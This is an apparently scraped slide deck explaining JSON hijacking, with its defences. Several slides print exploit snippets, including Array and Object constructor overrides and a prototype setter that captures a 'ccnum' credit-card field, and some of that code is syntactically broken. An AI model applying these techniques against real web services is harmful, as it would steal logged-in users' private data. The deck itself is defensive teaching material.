JSON
Download as PPTX, PDF0 likes475 views
The document discusses JSON hijacking methods and countermeasures. JSON hijacking involves exploiting vulnerabilities in JSON responses to steal sensitive user data from authenticated requests. It works by getting a user to visit a malicious site that executes scripts targeting JSON services the user is logged into. The script uses object prototype setters to hijack sensitive data from the JSON response. Countermeasures include using non-array JSON formats, POST requests only for JSON, and adding unpredictable parameters to requests.
![JSON Vs XML
<employees>
<employee>
<firstName>John</firstName> <lastName>Doe</lastName>
</employee>
<employee>
<firstName>Anna</firstName> <lastName>Smith</lastName>
</employee>
<employee>
<firstName>Peter</firstName> <lastName>Jones</lastName>
</employee>
</employees>
*********************************************************************************
{"employees":[
{"firstName":"John", "lastName":"Doe"},
{"firstName":"Anna", "lastName":"Smith"},
{"firstName":"Peter", "lastName":"Jones"}
]}](https://image.slidesharecdn.com/349964df-fb54-4d9e-a2da-3530083860df-150211062712-conversion-gate02/85/JSON-4-320.jpg)
![JSON Format Being Tested:
[
[
"Joe Smith",
"London",
"Apples"
]
]
Exploit Code:
function Array() {
{
var obj = this;
var ind = 0;
var getNext = function(x) {
obj[ind++] setter = getNext;
if (x)
document.write(dump(x));
};
this[ind++] setter = getNext;
}
Array Format](https://image.slidesharecdn.com/349964df-fb54-4d9e-a2da-3530083860df-150211062712-conversion-gate02/85/JSON-10-320.jpg)
![Object (bad format):
JSON Format Being Tested:
({
"person":{
"name":"Joe Smith",
"location":"London",
"fruit":"Apples"
}
})
Exploit Code:
var obj;
function Object() {
obj = this;
// define a setter for the killme property
this.__defineSetter__(‘killme’, function(x) {
for (key in obj) {
if (key != ‘killme’) {
document.write(dump(obj));
}
}
});
// call the setter when the JSON parse is done
setTimeout("obj['killme']=2;", 0);
}
Object (bad format)](https://image.slidesharecdn.com/349964df-fb54-4d9e-a2da-3530083860df-150211062712-conversion-gate02/85/JSON-13-320.jpg)
![JSON Hacking Countermeasures
The application should use standard anti-XSRF defenses to prevent cross domain
requests for sensitive data. Requests for JSON Objects should include an
unpredictable parameter that is verified before data is returned.
When an application retrieves JSON objects from its own domain,it is not restricted
to using <script> tag
One common mitigation is to make sure that your JSON service always returns its
response as a non-array JSON object.
Eg. The ASP.NET AJAX library uses the "d" parameter formatting for JSON data. This
forces the data in the example to appear in the following form:
{"d" : ["bankaccountnumber", "$1234.56"] }
never return JSON arrays in a response
you can restrict JSON requests to respond only to requests that use the HTTP POST
action.](https://image.slidesharecdn.com/349964df-fb54-4d9e-a2da-3530083860df-150211062712-conversion-gate02/85/JSON-14-320.jpg)
![ Why does Google prepend while(1); to their JSON responses?
while(1);[['u',[['smsSentFlag','false'],['hideInvitations','false'],
['remindOnRespondedEventsOnly','true'],
['hideInvitations_remindOnRespondedEventsOnly','false_true'],
['Calendar ID stripped for privacy','false'],['smsVerifiedFlag','true']]]]
The while(1); or &&&BLAH&&& prevents this: an AJAX request at mail.google.com will
have full access to the text content, and can strip it away. But a <script> tag insertion
blindly executes the JavaScript without any processing, resulting in either an infinite
loop or a syntax error](https://image.slidesharecdn.com/349964df-fb54-4d9e-a2da-3530083860df-150211062712-conversion-gate02/85/JSON-15-320.jpg)
JSON
- 1. JSON Hijacking & Countermeasures
- 2. Contents Introduction to JSON JSON Vs XML JSON Hijacking Methods JSON Hijacking Countermeasures
- 3. JSON Introduction JSON: JavaScript Object Notation. JSON is a syntax for storing and exchanging data. JSON is an easier to use alternative to XML. JSON is language independent * * JSON uses JavaScript syntax, but the JSON format is text only, just like XML. Text can be read and used as a data format by any programming language.
- 4. JSON Vs XML <employees> <employee> <firstName>John</firstName> <lastName>Doe</lastName> </employee> <employee> <firstName>Anna</firstName> <lastName>Smith</lastName> </employee> <employee> <firstName>Peter</firstName> <lastName>Jones</lastName> </employee> </employees> ********************************************************************************* {"employees":[ {"firstName":"John", "lastName":"Doe"}, {"firstName":"Anna", "lastName":"Smith"}, {"firstName":"Peter", "lastName":"Jones"} ]}
- 5. JSON Hijacking One of the first people to demonstrate JavaScript Hijacking was Jeremiah Grossman, who identified a vulnerability in Google GMail.(Google has fixed the problem.) Google was serving the current GMail users’ contacts in unprotected JavaScript, so an attacker could steal the contact list using JavaScript Hijacking. JavaScript Hijacking builds upon another type of widespread vulnerability: cross-site request forgery. A cross-site request forgery attack causes a victim to unwittingly submit one or more HTTP requests to a vulnerable website JSON Array hack allowing an evil site to grab sensitive user data from an unsuspecting user The hack involves redefining the Array constructor, which is totally legal in Javascript
- 6. This vulnerability requires that you are exposing a JSON service which… …returns sensitive data. …returns a JSON array. …responds to GET requests. …the browser making the request has JavaScript enabled …the browser making the request supports the __defineSetter__ method.
- 7. This attack can be achieved in 3 major steps: Step 1: Get an authenticated user to visit a malicious page. Step 2: The malicious page will try and access sensitive data from the application that the user is logged into. This can be done by embedding a script tag in an HTML page since the same-origin policy does not apply to script tags. <script src="http://<json site>/json_server.php"></script> The browser will make a GET request to json_server.php and any authentication cookies of the user will be sent along with the request.
- 8. Step 3: At this point while the malicious site has executed the script it does not have access to any sensitive data. Getting access to the data can be achieved by using an object prototype setter. In the code below an object prototypes property is being bound to the defined function when an attempt is being made to set the “ccnum” property. Object.prototype.__defineSetter__('ccnum',function(obj){ secrets = secrets.concat(" ", obj); }); At this point the malicious site has successfully hijacked the sensitive financial data (ccnum) returned by json_server.php
- 9. The main 4 ways you can format your JSON response are: 1. Array Format 2. Variable Setter Format 3. Call Back Function 4. Object (bad format)
- 10. JSON Format Being Tested: [ [ "Joe Smith", "London", "Apples" ] ] Exploit Code: function Array() { { var obj = this; var ind = 0; var getNext = function(x) { obj[ind++] setter = getNext; if (x) document.write(dump(x)); }; this[ind++] setter = getNext; } Array Format
- 11. Variable Setter JSON Format Being Tested: var result = { "person": { "name":"Joe Smith", "location":"London", "fruit":"Apples" } } Exploit Code: document.write(result);
- 12. Call Back Function JSON Format Being Tested: callBackFunction ({ "person":{ "name":"Joe Smith", "location":"London", “fruit":"Apples" } }) Exploit Code: function callBackFunction(data) { document.write(data); }
- 13. Object (bad format): JSON Format Being Tested: ({ "person":{ "name":"Joe Smith", "location":"London", "fruit":"Apples" } }) Exploit Code: var obj; function Object() { obj = this; // define a setter for the killme property this.__defineSetter__(‘killme’, function(x) { for (key in obj) { if (key != ‘killme’) { document.write(dump(obj)); } } }); // call the setter when the JSON parse is done setTimeout("obj['killme']=2;", 0); } Object (bad format)
- 14. JSON Hacking Countermeasures The application should use standard anti-XSRF defenses to prevent cross domain requests for sensitive data. Requests for JSON Objects should include an unpredictable parameter that is verified before data is returned. When an application retrieves JSON objects from its own domain,it is not restricted to using <script> tag One common mitigation is to make sure that your JSON service always returns its response as a non-array JSON object. Eg. The ASP.NET AJAX library uses the "d" parameter formatting for JSON data. This forces the data in the example to appear in the following form: {"d" : ["bankaccountnumber", "$1234.56"] } never return JSON arrays in a response you can restrict JSON requests to respond only to requests that use the HTTP POST action.
- 15. Why does Google prepend while(1); to their JSON responses? while(1);[['u',[['smsSentFlag','false'],['hideInvitations','false'], ['remindOnRespondedEventsOnly','true'], ['hideInvitations_remindOnRespondedEventsOnly','false_true'], ['Calendar ID stripped for privacy','false'],['smsVerifiedFlag','true']]]] The while(1); or &&&BLAH&&& prevents this: an AJAX request at mail.google.com will have full access to the text content, and can strip it away. But a <script> tag insertion blindly executes the JavaScript without any processing, resulting in either an infinite loop or a syntax error
- 16. Thank You